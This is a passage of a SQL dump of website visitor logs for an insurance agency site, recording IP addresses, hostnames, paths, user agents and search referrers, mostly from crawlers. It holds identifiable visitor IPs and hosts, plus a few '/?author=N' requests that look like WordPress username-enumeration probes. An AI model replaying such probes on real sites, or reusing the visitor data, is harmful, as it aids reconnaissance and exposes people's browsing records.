Spider','','','','0','0',0),(15087,'0b_1dd7761da63572253605a589af1618ac','1460138931','206.210.27.33','proxy3.newyorklife.com','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15089,'0b_1dd7761da63572253605a589af1618ac','1460138931','206.210.27.33','proxy3.newyorklife.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15090,'0b_1dd7761da63572253605a589af1618ac','1460138931','206.210.27.33','proxy3.newyorklife.com','/?p=283','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15092,'0b_df5ed525658af8737a0453d644586dd5','1460138944','206.210.27.33','proxy3.newyorklife.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','51',0),(15093,'0b_1dd7761da63572253605a589af1618ac','1460138945','206.210.27.33','proxy3.newyorklife.com','/?p=8','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','Unknown Spider','','','','0','0',0),(15096,'0b_2826faa1c3be7ea78d97f23b793e1b6c','1460139363','75.99.61.171','ool-4b633dab.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.bing.com/search?q=empire%20insurance%20ny%20mga&qs=n&form=QBRE&pq=empire%20insurance%20ny%20mga&sc=1-23&sp=-1&sk=&cvid=A83460794C5842C8B9A6D6D7263286AD','empire insurance ny mga',1,'Win7','Chrome 49','us','','Bing','','','','','0','0',0),(15099,'0b_2826faa1c3be7ea78d97f23b793e1b6c','1460139366','75.99.61.171','ool-4b633dab.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(15102,'0b_70bf3c028e81192bd847ae12d2679c40','1460139821','75.99.61.171','ool-4b633dab.static.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=empire+insurance+agency+ny&src=IE-TopResult&FORM=IE10TR','empire insurance agency ny',1,'Win7 x64','IE 10','us','1920 x 1080','Bing','','','','','0','0',0),(15105,'0b_70bf3c028e81192bd847ae12d2679c40','1460139823','75.99.61.171','ool-4b633dab.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','0',0),(15107,'0b_70bf3c028e81192bd847ae12d2679c40','1460139828','75.99.61.171','ool-4b633dab.static.optonline.net','/carriers/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','0',0),(15108,'0b_70bf3c028e81192bd847ae12d2679c40','1460139838','75.99.61.171','ool-4b633dab.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15111,'0b_70bf3c028e81192bd847ae12d2679c40','1460139841','75.99.61.171','ool-4b633dab.static.optonline.net','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15114,'0b_70bf3c028e81192bd847ae12d2679c40','1460139869','75.99.61.171','ool-4b633dab.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/contact/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15117,'0b_70bf3c028e81192bd847ae12d2679c40','1460139882','75.99.61.171','ool-4b633dab.static.optonline.net','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15120,'0b_70bf3c028e81192bd847ae12d2679c40','1460139892','75.99.61.171','ool-4b633dab.static.optonline.net','/insentives/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/contact/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15122,'0b_70bf3c028e81192bd847ae12d2679c40','1460139895','75.99.61.171','ool-4b633dab.static.optonline.net','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/insentives/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15125,'0b_70bf3c028e81192bd847ae12d2679c40','1460139924','75.99.61.171','ool-4b633dab.static.optonline.net','/insentives/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15126,'0b_70bf3c028e81192bd847ae12d2679c40','1460139928','75.99.61.171','ool-4b633dab.static.optonline.net','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/insentives/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15128,'0b_70bf3c028e81192bd847ae12d2679c40','1460139932','75.99.61.171','ool-4b633dab.static.optonline.net','/carriers/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15129,'0b_70bf3c028e81192bd847ae12d2679c40','1460139945','75.99.61.171','ool-4b633dab.static.optonline.net','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15132,'0b_70bf3c028e81192bd847ae12d2679c40','1460139953','75.99.61.171','ool-4b633dab.static.optonline.net','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15135,'0b_70bf3c028e81192bd847ae12d2679c40','1460139961','75.99.61.171','ool-4b633dab.static.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','51',0),(15137,'0b_70bf3c028e81192bd847ae12d2679c40','1460139961','75.99.61.171','ool-4b633dab.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','0',0),(15138,'0b_70bf3c028e81192bd847ae12d2679c40','1460139989','75.99.61.171','ool-4b633dab.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','0',0),(15141,'0b_25b755d2f2ddecfba1b89ccaf7bf2c1a','1460142340','66.249.66.40','crawl-66-249-66-40.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15144,'0b_25b755d2f2ddecfba1b89ccaf7bf2c1a','1460142346','66.249.66.34','crawl-66-249-66-34.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(15146,'0b_25b755d2f2ddecfba1b89ccaf7bf2c1a','1460142372','66.249.66.18','crawl-66-249-66-18.googlebot.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(15147,'0b_bfcf643d250307946c7837195992977c','1460144741','180.76.15.34','baiduspider-180-76-15-34.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15149,'0b_849e5d00c61edadae5f1742a0f342707','1460146473','66.249.66.14','crawl-66-249-66-14.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(15150,'0b_185e53abee897b97367b574cbff0a271','1460146749','180.76.15.24','baiduspider-180-76-15-24.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15152,'0b_2444a92189b07b1eda99a3e0e2595d32','1460146920','95.139.231.139','node-139-231-139-95.domolink.tula.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(15155,'0b_2444a92189b07b1eda99a3e0e2595d32','1460146922','95.139.231.139','node-139-231-139-95.domolink.tula.net','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(15156,'0b_2444a92189b07b1eda99a3e0e2595d32','1460146923','95.139.231.139','node-139-231-139-95.domolink.tula.net','/?author=2','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(15159,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149536','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15162,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149538','144.76.93.46','static.46.93.76.144.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15165,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149543','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15168,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149545','144.76.93.46','static.46.93.76.144.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15171,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149547','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?p=288','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15174,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149549','144.76.93.46','static.46.93.76.144.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15177,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149552','144.76.93.46','static.46.93.76.144.clients.your-server.de','/about-us/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15179,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149554','144.76.93.46','static.46.93.76.144.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15180,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149556','144.76.93.46','static.46.93.76.144.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15182,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149558','144.76.93.46','static.46.93.76.144.clients.your-server.de','/agent-tools/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15183,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149560','144.76.93.46','static.46.93.76.144.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15185,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149562','144.76.93.46','static.46.93.76.144.clients.your-server.de','/carriers/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15188,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149564','144.76.93.46','static.46.93.76.144.clients.your-server.de','/case-status/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15189,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149567','144.76.93.46','static.46.93.76.144.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15192,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149569','144.76.93.46','static.46.93.76.144.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15195,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149571','144.76.93.46','static.46.93.76.144.clients.your-server.de','/contact/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15197,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149573','144.76.93.46','static.46.93.76.144.clients.your-server.de','/igo/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15200,'0b_028bb81e6d0fd1b1a4593a77876617a7','1460149574','144.76.93.46','static.46.93.76.144.clients.your-server.de','/register/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(15201,'0b_2278b3fc890bff5abe7b7f109d26bda7','1460150152','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15204,'0b_b7d089d7ae195fabfcf39e1d8573173b','1460150278','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15207,'0b_51ac102498a7ba308f6b496751b852b8','1460152658','180.76.15.142','baiduspider-180-76-15-142.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(15210,'0b_0a213dbe16a697dd6a11de8d33a4ad42','1460153462','198.12.80.142','198-12-80-142-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','http://www.empireins.com/','',0,'WinXP','Google Chrome','us','','','','','','','0','0',0),(15213,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153842','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(15216,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153844','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(15219,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153904','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(15221,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153905','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(15222,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153912','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','51',0),(15224,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153923','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/agent-tools/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','51',0),(15225,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153931','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/carriers/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','51',0),(15228,'0b_93dfe1492e8484d4ea6e7fd7f8346db2','1460153932','70.122.145.145','cpe-70-122-145-145.tx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(15231,'0b_a254f9309066ee85ce60101bb4cc64a8','1460155060','52.36.61.182','ec2-52-36-61-182.us-west-2.compute.amazonaws.com','/robots.txt','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(15234,'0b_a254f9309066ee85ce60101bb4cc64a8','1460155061','52.36.61.182','ec2-52-36-61-182.us-west-2.compute.amazonaws.com','/','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(15237,'0b_184e7ffd13f94039aeb9d03b908567e3','1460155088','157.55.39.93','msnbot-157-55-39-93.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15240,'0b_927d3a5003011ed416568b70a7ccce86','1460156123','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15242,'0b_21d6944ba34dd16dbddf83e9efdbb781','1460156417','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(15245,'0b_4e50fca13e0df0e7a7c9b3991a65d3fb','1460162707','180.76.15.8','baiduspider-180-76-15-8.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(15246,'0b_8a03747805b4e370961bd3cc12f4426a','1460162871','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(15249,'0b_82604cb05035c506c7b3ec7052f9e56a','1460163231','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110131 Firefox/4.0b11pre','','',0,'Win7 x64','Firefox 4','','','','','','','','0','0',0),(15251,'0b_819a9875f9adf098eb8963609f6830ed','1460163339','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506)','','',0,'WinVista','Firefox 3','gb','','','','','','','0','0',0),(15252,'0b_965a56e106f087d152707bd835c650f9','1460164935','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15254,'0b_af836f4e8d8faf4e463aa16e20afa88a','1460166478','162.210.196.100','hosted-by.leaseweb.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(15257,'0b_af836f4e8d8faf4e463aa16e20afa88a','1460166481','162.210.196.100','hosted-by.leaseweb.com','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15258,'0b_af836f4e8d8faf4e463aa16e20afa88a','1460166483','162.210.196.100','hosted-by.leaseweb.com','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15260,'0b_af836f4e8d8faf4e463aa16e20afa88a','1460166487','162.210.196.100','hosted-by.leaseweb.com','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15261,'0b_af836f4e8d8faf4e463aa16e20afa88a','1460166489','162.210.196.100','hosted-by.leaseweb.com','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15263,'0b_af836f4e8d8faf4e463aa16e20afa88a','1460166491','162.210.196.100','hosted-by.leaseweb.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15266,'0b_737bf959e5db41c1582c9991de2d91aa','1460166710','40.77.167.98','msnbot-40-77-167-98.search.msn.com','[404] /documents/NoMoreHassles.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15269,'0b_1cbc5271c80a383c18a04887b333de76','1460167855','66.249.66.12','crawl-66-249-66-12.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(15270,'0b_5c8859acdf1eddbd3e16509ee9e43596','1460168082','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15273,'0b_526cd53a23d48676801c07805b938c35','1460170604','208.115.111.66','208-115-111-66-reverse.wowrack.com','/home/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15275,'0b_da5be511f9ec36b90e438cbd9896d1a9','1460171592','40.77.167.14','msnbot-40-77-167-14.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15276,'0b_27d9f1075b2e817792c591d49819895f','1460171848','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15279,'0b_cb4630b17e9dec514d3ffb405c105208','1460174990','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15281,'0b_9a9deaae07e04922341728415fdb0f71','1460175487','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15282,'0b_8f8f79aea82158035dfc975dec7980d9','1460176659','40.77.167.14','msnbot-40-77-167-14.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15285,'0b_e6d6a5c6bc645ca1dddc2baae1bdbfd6','1460177826','208.115.111.66','208-115-111-66-reverse.wowrack.com','/igo/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15287,'0b_b23835ef153c8eb0deec67661bfb9a1f','1460178936','40.77.167.14','msnbot-40-77-167-14.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15290,'0b_c3290f7aff4bf00d218d4be213f55b60','1460180848','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(15291,'0b_c3290f7aff4bf00d218d4be213f55b60','1460180849','178.255.215.70','crawl06.exabot.com','/main.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(15293,'0b_c3290f7aff4bf00d218d4be213f55b60','1460180853','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(15296,'0b_c3290f7aff4bf00d218d4be213f55b60','1460180854','178.255.215.70','crawl06.exabot.com','/main.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(15297,'0b_4067c46424984c4b3ab46dd178c717e4','1460182192','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(15300,'0b_7b28b367c1e1e0eb84c2f8c2cb136494','1460187318','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; 